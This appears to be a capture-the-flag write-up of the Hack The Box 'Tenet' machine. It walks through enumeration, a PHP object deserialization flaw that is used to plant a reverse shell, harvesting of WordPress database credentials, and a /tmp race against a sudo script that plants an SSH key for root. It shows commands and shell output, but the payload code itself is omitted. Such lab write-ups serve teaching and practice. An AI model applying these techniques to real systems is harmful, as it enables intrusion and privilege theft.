Exploiting PHP deserialization 🔐
Table of Contents
Intro to Insecure deserialization
Serialization is when an object in a programming language (say, a Java or PHP object) is converted into a format that can be stored or transferred. Whereas deserialization refers to the opposite: it’s when the serialized object is read from a file or the network and converted back into an object.
Insecure deserialization vulnerabilities happen when applications deserialize objects without proper sanitization. An attacker can then manipulate serialized objects to change the program’s flow.
Today, let’s talk about PHP object injections. They are insecure deserialization vulnerabilities that happen when developers deserialize PHP objects recklessly.
Enumeration
nmap results
nmap -sC -sV -O nmap/tenet 10.129.158.233
gobuster results
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://tenet.htb
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://tenet.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/05/26 23:39:47 Starting gobuster in directory enumeration mode
===============================================================
/wp-content (Status: 301) [Size: 311] [--> http://tenet.htb/wp-content/]
/wp-includes (Status: 301) [Size: 312] [--> http://tenet.htb/wp-includes/]
/wp-admin (Status: 301) [Size: 309] [--> http://tenet.htb/wp-admin/]
WPScan results
wpscan -e u --url http://tenet.htb
Users Revealed in WPScan
neil
protagonist
Wordpress Application running on port 80
In Some comment neil user talking about sator php file and the backup
Let’s add sator.php in url and check any file there or not.
Let’s replace Domain name with IP Address
Backup file found in the same directory
If you remember, neil taking about backup Let’s find that backup
file. most developers change backup file into .bak
format.
Link: http://10.129.158.233/sator.php.bak
Sator.php.bak file
After analyze
the code we see that the script looks for a GET input variable arepo
and unserializes it. we might be able to exploit it using PHP Object Deserialization
and the class called DatabaseExport
with a __destruct
function This function is what we can use to get RCE
. The function uses file_put_contents
to write the variable data to the file defined in the variable user_file
.
Exploitation
So with the help of the article
we write the class DatabaseExport
on our local machine, define user_file
to be a php file and the data to be a php_reverse_shell
to our local machine.
Now let’s create a php
script.
We got the shell
┌──(root💀kali)-[~/htb/tenet]
└─# ncl
listening on [any] 9001 ...
connect to [10.10.14.172] from (UNKNOWN) [10.129.158.233] 43438
ls
bhavsec.php
index.html
sator.php
sator.php.bak
users.txt
wordpress
Let’s go to wordpress directory and view content of wp-config.php
cd wordpress
ls -la
total 228
drwxr-xr-x 5 www-data www-data 4096 May 27 15:08 .
drwxr-xr-x 3 www-data www-data 4096 May 27 15:22 ..
-rw-r--r-- 1 www-data www-data 405 Feb 6 2020 index.php
-rw-r--r-- 1 www-data www-data 19915 Feb 12 2020 license.txt
-rw-r--r-- 1 www-data www-data 7278 Jun 26 2020 readme.html
-rw-r--r-- 1 www-data www-data 7101 Jul 28 2020 wp-activate.php
drwxr-xr-x 9 www-data www-data 4096 Dec 8 22:13 wp-admin
-rw-r--r-- 1 www-data www-data 351 Feb 6 2020 wp-blog-header.php
-rw-r--r-- 1 www-data www-data 2328 Oct 8 2020 wp-comments-post.php
-rw-r--r-- 1 www-data www-data 2913 Feb 6 2020 wp-config-sample.php
-rw-r--r-- 1 www-data www-data 3185 Jan 7 10:04 wp-config.php
drwxr-xr-x 5 www-data www-data 4096 May 27 15:08 wp-content
-rw-r--r-- 1 www-data www-data 3939 Jul 30 2020 wp-cron.php
drwxr-xr-x 25 www-data www-data 12288 Dec 8 22:13 wp-includes
-rw-r--r-- 1 www-data www-data 2496 Feb 6 2020 wp-links-opml.php
-rw-r--r-- 1 www-data www-data 3300 Feb 6 2020 wp-load.php
-rw-r--r-- 1 www-data www-data 49831 Nov 9 2020 wp-login.php
-rw-r--r-- 1 www-data www-data 8509 Apr 14 2020 wp-mail.php
-rw-r--r-- 1 www-data www-data 20975 Nov 12 2020 wp-settings.php
-rw-r--r-- 1 www-data www-data 31337 Sep 30 2020 wp-signup.php
-rw-r--r-- 1 www-data www-data 4747 Oct 8 2020 wp-trackback.php
-rw-r--r-- 1 www-data www-data 3236 Jun 8 2020 xmlrpc.php
MYSQL Database Credentials revealed
SSH Login Successful
neil@tenet:~$ whoami
neil
neil@tenet:~$ id
uid=1001(neil) gid=1001(neil) groups=1001(neil)
neil@tenet:~$
User Owned
Privilege Escalation
sudo -l results
seems like we can execute /user/local/bin/enable.sh
script.
neil@tenet:~$ sudo -l
Matching Defaults entries for neil on tenet:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:
User neil may run the following commands on tenet:
(ALL : ALL) NOPASSWD: /usr/local/bin/enableSSH.sh
neil@tenet:~$ ls -la /usr/local/bin/enableSSH.sh
-rwxr-xr-x 1 root root 1080 Dec 8 13:46 /usr/local/bin/enableSSH.sh
enableSSH.sh file
neil@tenet:~$ cat /usr/local/bin/enableSSH.sh
The addkey() function look interesting.
addKey() {
tmpName=$(mktemp -u /tmp/ssh-XXXXXXXX)
(umask 110; touch $tmpName)
/bin/echo $key >>$tmpName
checkFile $tmpName
/bin/cat $tmpName >>/root/.ssh/authorized_keys
/bin/rm $tmpName
}
Let’s see what’s the script doing.
This script writes a id_rsa.pub
key defined in key to a randomly generated file format of /tmp/ssh-XXXXXXXX
and then copies the contents of the file to the known_hosts
of the root And then deletes the tmp file.
We have Permission to write
the file. Let’s replace root SSH_PUB_KEY
with our’s ssh public
key.
So, if we can write our own ssh-key
to the tmp file before it gets copied to known_hosts
, our key will get written to known_hosts
and we can ssh into root.
Let’s write an infinite
while loop in bash that continuously
writes our ssh key to any file of format /tmp/ssh-XXXXXXXX
using wild character. And while this runs, we run the script
as sudo a number of times
Copy our SSH Public key from kali machine
Then, run the while
loop Then run the sudo
command 3-4 times.
Root Owned
Thanks for reading this post, if you like my work you can support by buying me a coffee. ☕️